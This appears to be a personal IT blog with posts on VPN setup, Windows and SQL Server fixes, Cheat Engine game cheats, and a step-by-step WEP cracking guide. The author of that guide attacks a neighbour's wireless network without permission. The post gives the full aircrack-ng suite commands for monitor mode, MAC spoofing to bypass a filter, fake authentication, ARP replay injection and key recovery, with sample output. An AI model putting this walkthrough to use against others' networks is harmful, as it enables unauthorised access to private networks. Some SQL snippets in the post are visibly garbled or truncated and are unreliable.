IPSec VPN with Netgear FVS318v3

My Belkin N1 Vision router decided to die the other day. So i realized it was time for an industrial strength router. Checked out a really nice one with Linux built in and great application support. It was a little prize for me right now, just got a new girlfriend and moved in with her…. 🙂

I finally decided for the Netgear FVS318v3 which comes with a built in IPSec VPN server for 8 concurrent connections. Netgear wants ~$50 for the client software which I wasn’t really happy about paying. So I started checking around for a free alternative. Finally I came across Shrew Soft VPN Client (http://www.shrew.net/). It’s free and really light weight. It took some figuring out how to configure it all so I thought it was a good idea to share it.

I presume that you already have DynDNS enabled. If you have a dynamic WAN address it’s a must to get this to work.

First you have to set up your FVS318 router to accept the connections.

  1. Log on to your router and go to the “VPN Wizard” in the left hand menu.
  2. Just click “Next”…
  3. You have to set a name for your connection and a pre-shared key (PSK). Select “A remote VPN client” as connection type.
  4. You will get a confirmation screen next. Just click “Done”.

Now your router is up to speed and you need to download the VPN client from http://www.shrew.net/download
Ones installed it’s time to set up your new connection.

  1. In the router admin page select “IKE Policies” in the left hand menu. The two pieces of information you are interested in is “Local ID” and “Remote ID”.
  2. Now start Shrew Soft VPN Access Manager and click “Add”.
  3. Now enter your DynDNS, or static WAN address if you have one, in the “Host Name or IP Address” field.
  4. Set “Auto Configuration” to “disabled”.
  5. Set “Local Host” – “Address Method” to “Use an existing adapter and current address”.
  6. Now go to the “Name Resolution” tab. If you know the addresses to wins server and/or dns server on the remote network enter them here. If not uncheck the check boxes.
  7. Now go to the “Authentication” tab and set “Authentication Method” to “Mutual PSK”.
  8. “Local Identity” should be the field “Remote ID” on the routers “IKE Policies” page. “Identification Type” should be “Fully Qualified Domain Name”.
  9. On the “Remote Identity” tab the “Identification Type” should be “Fully Qualified Domain Name” and “FQDN String” should be the “Local ID” from the routers “IKE Policies” page.
  10. Moving on to the “Credentials” tab fill in your PSK in the “Pre Shared Key” field. In this case “areallylamekey”.
  11. Then you go to main tab “Policy”.
  12. Uncheck the “Obtain Topology Automatically or Tunnel All” check box.
  13. Click the “Add” button.
  14. Type in your network. To route all the 192.168.0.x addresses over the VPN tunnel enter address and netmask If you have the same network address range at home and in your current location you can enter specific addresses or add an other topology entry that excludes those addresses.
  15. Then hit “Save” and you will return to the mane window.
  16. Dubbel click your connection and select “Connect”. That’s it!

Your now up and running with your own secure IPSec tunnel to your home or office!

Unable to display current owner

Run across a strange problem today. On a test server running Microsoft Windows Server 2008 one developer discovered that he couldn’t delete a file even though he was admin on the system. I connect to the system and realize that I have the same problem, even though I’m domain admin. When I checked the permissions on the file it just displayed that I didn’t have the permissions to see the ACL and redirected me to the ownership tab. All I could see there was “Unable to display owner”. When I tried to take ownership I got “Access denied again”. So back to the trusted CMD i thought! Same thing cacls.exe returned the same thing and gave me Access denied…


I then ran psexec from sysinternals:psexex -s cmd.exe
This starts the CMD as local system account. Now I have access to anything, or so i thought. NOT!
Same thing again, couldn’t do anything with the file or view any options. Back to the drawingboard and then I came up with a reboot. Tried it and failed, it was a desperate measure and it was pretty clear that it wouldn’t fix anything.


Then I found the solution, I needed to access the file without windows pounding the NTFS rights in my head. I really didn’t want to rip out the hard drive and put it in to an other server to do it. So this is what I did….


Download MoveFile from sysinternals.
Run cmd.exe as administrator.
Run movefile c:{path}{fucked-up-file} “”


That will trigger the operating system to delete the file during system boot.

SQL transaction logs growing and growing and …

Problems with growing transaction logs on SQL servers is a common problem. But many admins doesn’t think twice about the problem, they just add more disk space. The transaction log is only needed when you want to do a restore to an other point then the last backup. So in many cases they are not needed right after a backup. Or you want to take a backup on them and then free up the space on you raid 10 disks that are more expensive then your backup media. To free up all the space used you need to set the database in simple recovery mode and then do a shrink on the DB. When that is done you place the DB back in the FULL RECOVERY MODE. So why not do this automatically ones a week right after the backup?

Just add an T-SQL section to your maintenance plan and run the code below:

[sql]EXEC sp_MSForEachDB

Or if you want to build a custom list of databases, so you don’t run this on all the DB’s run this code to generate the T-SQL:

[sql]EXEC sp_MSForEachDB
PRINT "GO";'[/sql]

The important thing is to set TRUNCATEONLY, if you don’t you will fragment the entire DB file. When you run the command above without the TRUNCATEONLY parameter it will take the last record in the DB file and place in the first hole of empty space in the DB file and so on. So you will create a fragmentation if you do so.
Another way to do it, which is slower and created more disk IO but can be done, is to do a transaction log backup and then just delete the transaction file backup.

MS documentation: http://msdn.microsoft.com/en-us/library/ms190488.aspx

IIS 7 FTP access denied while uploading files

I got this strange problem yesterday at work. One of our developers was trying to upload files to e new server and he got 500 access denied each time he tried. After he spent hours double checking all the NTFS rights and IIS settings he asked me for help. At the first look I thought the IIS server had been messed up some how. After verifying everything that he told me was OK, after all he is a coder and they usually don’t understand servers, I really didn’t know what to do next. So I thought about it for a moment and then I started from scratch, checked the entire solution from the bigger picture.

So with the system blueprint in front of me it all started to clear up. The server was situated in our server center across town and all his traffic was passing through a VPN tunnel between our two ISA 2006 servers. The ISA server sets all the FTP rules to “Read-Only” by default but I didn’t realise that this was a problem for the VPN site to site tunnel also. After checking the routing rule and then the access rule for the communication between the two networks I found the settings for FTP traffic between the two ISA servers. After I unchecked the “Read-Only” check box for the FTP traffic on the VPN site to site access rule it all worked as designed.

World Domination II Hack

I was trying to pass the time the other night while waiting on a very slow crypto crack. On one of my servers I found the old flash game World Domination II. First I played it over and over again but then I wanted the edge. Like when the US goes to war with superior technology, money and control over the media. First i googled it to see if someone all ready done the work for me, just like you did when you found this. I actually found a hacked version online with limitless cash and less cash for the opponents. But I wanted more. So you can start out by testing the online hacked version and then follow the tutorial below.

World Domination 2 (full) – Hacked
Easy: $999999,000,000
Medium: $999999,000,000
Hard: $999999,000,000
Enemies money is lowered to $50.000.000


First get Cheat Engine: http://www.cheatengine.org/downloads.php
Install it and start it!

In the top left corner there is a computer icon, click it.
You will see a list of processes that you can “hook” on to.
If your running the game online “hook” on to you browser process (iexplorer or firefox) or the WDII.exe if your running the downloaded version.

Now start the game and select your opponents and level and start.
I selected hard so I have $55.000.000 in cash. So I take 55 * 8 = 440.
Takes Cheat Engine and puts 440 in the value box and hits First Scan.

You will get a number of hits that we can sort through later. Now return to the game and either gain money through Resources or spend money some how.

I selected Resources and gained some cash. Now I’m up to $86.000.000. So I take 86 * 8 = 688.
Goes back to Cheat Engine and put that in the value box and hit Next Scan.
You will be left with two results, double click them both and changed them to something like 8000 and then freeze them. You have to change both of them otherwise you cant spend any money just look at a pretty number on the dashboard.

Before you do anything else go back to the game and hit the Propaganda button, select a city and check your Propaganda strength. Mine was 71%, so 71 * 8 = 568.
Take that and put it in the value field of Cheat Engine and hit New Scan and then First Scan.

Again a large number of hits, so do something to change your Propaganda Strength in the game.
My new strength was 87%. So 87 *8 = 696. Put that in the value field and hit Next Scan.
Double click the value, change it to 800 and freeze it and you will have 100% propaganda for ever.

You can change all the other values of the game, like number of warheads and stuff like that but that will really take all the fun out of the game. Now you can build what ever you want and start diplomatic relations with who ever you want.

WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just to good to be true! So here is a little run down on how to do this easily. This guide can also be used for any other hardware but it has some special info just for the fonera.

Here are a guide to cracking your fonera router:
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a linux computer for your pocket, much like your iPhone if you have one. The big differnece is that this linux pocket computer is great for wlan use. First start an SSH session to the router and login.

We need to setup the wlan card for our use. If your connected via the “Legend” wlan you have to keep that. I prefer to connect via cable to the router and then destroy the “Legend” network before I begin (wlanconfig ath0 destroy). But even if you destroy that you can run the rest of the guide with ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

[ps]wlanconfig ath1 create wlandev wifi0 wlanmode monitor[/ps]

Then we want a list of networks around us that we can attack. With airodump-ng without any parameters we can get a list of wlans available for us.

[ps]airodump-ng ath1[/ps]

The router respondse with a list of networks and information about encryption and you can also see a list of clients that the card picks up.
In the list below no clients are seen but the usually show up, this is just a quick scan I did to show the prinicple. When you have your list just it CTRL + C to get back to the prompt.

[ps]CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes[/ps]

My unlucky neighbor that has chosen to call his/hers wlan for MAD will be todays target. I selected this becuase it’s MAC controlled. If the correct MAC aren’t in the routers “Allowed list” or “White list” I will be unable to connect. To be able to handle the amount of data that I need to collect to be able to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First you need create an account on you windows box that doesn’t have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

[ps]mkdir share[/ps]

Then mount the share to that folder like this:

[ps]mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME>; -o username=<USERNAME>,password=<PASSWORD> /mnt/share[/ps]

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

[ps]airodump-ng -c 3 –bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

So what have we done now? We provided airodump-ng with some importent information:


We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

[ps]–bssid 00:18:4D:8C:52:0E[/ps]

We supplied the MAC address of the wlan base so it knows what to listen for.

[ps]-w /mnt/share/MAD[/ps]

W stands for “Write” we want airodump-ng to dump the information into the file MAD on the Windows box share.


What wlan instance to use.

The router will also show us the information in real time while it collects the IV’s (inital vectors) that we need for the crack.

[ps]CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5[/ps]

Now you can see the client that is connected as well. When I started attacking this network I didn’t know it had a MAC filter running but I found out pretty quick when I couldn’t associate with it or authenticate with it. If you can’t do an association like the one below or if packet injection fails (it’s not sending any packets) you probable is talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

[ps]aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)[/ps]

So what did I try here? I did a “Fake Authentication” against the router to so if it allows me to connect. Please note that the -h (my client MAC is the same as the client I found earlier).
In this screen shoot I have all ready faked my MAC to be able to connect to the router. I didn’t save any screen shoot of the failure. I quick run down of the command above:


Fake Authentication attack


How often to send a Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate)

[ps]-e "MAD"[/ps]

The SSID of the router.

[ps]-a  00:18:4D:8C:52:0E[/ps]

The MAC address of the router.

[ps]-h  00:22:43:6E:BD:F5[/ps]

The MAC address of the client. In this case a spoofed one to get around the MAC filter but in all other cases you can use you original MAC or just 1:2:3:4:5:6


The wlan instance to use.

So this raises two questions. First how do you get your MAC?


This command will show you all the info on all the network devices you have and you can extract the MAC address of the wifi0 in this case.
Second question how do I spoof my MAC?

[ps]ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like “Device Not Ready”.
Just try to destroy all the athX instances before you take the wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing so let’s get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start the airodump-ng with the file write option again:

[ps]airodump-ng -c 3 –bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

Then start a second SSH client and connect to the FON and login again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250.000 for us to be able to crack a 128bit key and over 800.000 for heavier keys. You can collect all that data by just listening to the traffic but it will take days or even weeks. We can do it much quicker our selfs. In the second window/session we will start a packet injection attack of the ARP kind. In short ARP is a way for network gear to keep track of witch device have witch IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initial vector) and that’s what we count as data so and then use to crack the key. So let’s get the IV’s coming!

[ps]aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1[/ps]

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the “packets sent” counter stopping that usually just that you lost you association with the router. Just hit CTRL + C and run the “Fake Authentication” attack again. If this happens over and over again set the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that just open a third window/session so you can have it all running at once.

Once we collected enough IV’s we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and if no key is found restart the crack every 5.000 IV’s collected. How ever this is not a job for the FON due to it’s limited processing power. I usually use my linux box or my windows box where I have more computing power. The windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

[ps]aircrack-ng c:tempfoneramad_mac-01.cap[/ps]

The result will be something like this:

[ps]Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%[/ps]

As you can see I only needed little over 170.000 IV’s to do this and when the crack was successful I could stop the attack on the network.
So now we have the key:


People who get this far still ask me a question, “How do I use that key from windows?”
The routers accepts both ASCII phrases and hex keys like the one above. Just remove the : from the key and windows will be able to connect to the network.

Youtube to MP3

Have tested a lot of these programs avalible to do this. A friend of mine needed a lot of, let’s say not mainstream, music for a party. This webpage is the best tool I have tried for this!


Exchange 2007 Active sync screen lock issue with iPhone

A while ago I updated an Exchange Server 2007 with the latest service pack for a client. The SP automatically added a new Exchange ActiveSync Mailbox Policy that required the connected devices to be password protected when the screen went dark. It’s a good idea for many security reasons but the users didn’t like it at all, and the customer is always right. Changed the default policy so password wasn’t required anymore and all was good… for a while.

Then the iPhone users started complaining that there auto lock settings was restricted, they could select 1 to 5 minutes but the alternative “Never” was gone. This setting, when password isn’t configured, just turns the screen black after a few minutes of inactivity. Again I thought that would be a good thing for many reasons. The iPhone uses enough battery as is. As always if you can’t have it you need it, want it and must have it. So I reviewed the settings again. There was a setting called “Time without user input before password must be re-entered (in minutes)” that was set to 15 minutes but it was grayed out. After testing a lot of things I finally executed a powershell command to solve the issue. Then I noticed that the grayed out option had changed to 0 minutes. So I tested to just check the “Require password” check box bringing all the grayed out options back, setting the timeout to 5 minutes, unchecking the “Require password” option, again graying out the setting I just change, then apply. Then the “Never” option disappeared from the iPhone again. So MS did it again, messed up the GUI, a grayed out option shouldn’t effect anything.
Thank god for powershell so you can get down with the software properly!

Hope the pictures give you a clear picture of what I mean. If you have any questions hit me with a comment and I will try to answer your questions.

SAS Zombie Assault Cheat / Hack

Today I will give you a simple guide to cheating on flash games with the help of Cheat Engine version 5.5. The flash game of choice today is SAS 2: Zombie Assault. It doesn’t really matter what flash game we are talking about the concept is the same! I did find a way to get more money but I couldn’t find the location of the money counter to update it directly. If anyone have some input on that I would really like to hear it!

So let’s get to work! First start the game, from your favorite supplier or here: http://www.ninjakiwi.com/Games/Action/Play/SAS-Zombie-Assault-2.html

Then start Cheat Engine. If you don’t have it get it here: http://www.cheatengine.org/downloads.php

Next up is to attach cheat engine to the browser process. Cklick the computer icon in the top left corner of cheat engine to bring up the process list. Then look for your browser and attach to it. Now we need some values to search for. Start the game and look at what values you have and what you would like to change.

We have our ammo counter at the lower left corner, we have the cash. In other games you may have other things you would like to change.

Lets start with the ammo counter for the pistol (this will work for any other gun you get later in the game, even sentry guns).

1. Type in the number of bullets you have left in your gun into the “Value” field of cheat engine and the hit “First Scan”.
2. When the scan have finished you will have a bunch of results, I got almost 200000 results. We can’t change all of them hoping for the best we need to dig deeper.
3. Go back to the game and wast some more ammo.
4. Take the new ammo count and put into the “Value” field of cheat engine and hit “Next Scan”.
5. If you now have only one result you been lucky. If not, repeat step 3 and 4 until you only have one result in the list.
6. Now double click the result, it will pop up in the list at the bottom of the screen.
7. Check the box “Frozen” for the value and that gun will never run out of bullets.

You can do exactly the same with the grenades but you still have to get some first. With the sentry guns it’s the same but your not in control of the firing so wait till the gun is not shooting and then search for it’s ammo count.

Now we get to the money. As I wrote earlier I was unable to find the money variable in memory, but I didn’t put much time in to it either. There is however one way to get more money, the wave bonuses. When you complete a wave you always gets a bonus. On the higher waves it’s $500. To get more money do this:

1. Search for the number of the current wave.
2. Wait for the next wave, when the wave indicator has changed “Next Scan” for the new value.
3. Repeat 1 and 2 until you have only 2 results left.
4. Get them down in the list and freeze them.
5. Change them to a wave that gives good money but isn’t to hard with your current gear.
6. Complete the wave and get the bonus, the bonus will be repeated over and over again until you unfreeze the values.

Hope this has been help full for you all.

Must declare the scalar variable @ID

Was just burning the midnight oil on a project for a client. Working with asp.Net for the first time in ages. Making a quick fix, adding a new form for editing customer details, I used theSqlDataSource control. Usually I work with the SqlCommand in SqlDataClient directly but now I needed paging and sorting fixed quick and easy! I had a really big problem with the select command parameters. When you use them with the SqlCommand you declare them with an @ prefix in the select command like this:

[sql]Select * FROM Customers WHERE CustomersID = @ID [/sql]

(SELECT * is a sin, I know!)

Then declare the variable as: SqlCommand.Parameters.Add(new SqlParameter(“@ID”, SqlDbType.Int))
Received errors like “Must declare the scalar variable @ID” and so on. Checked, dubble checked and triple checked… The variable was defined!
But no! Some idiot at MS decided to think outside of the box and the declaration for the SqlDataSource control should be without the @!


[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<asp:Parameter Name="@ID" Direction="Input" />

But instead this:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<asp:Parameter Name="ID" Direction="Input" />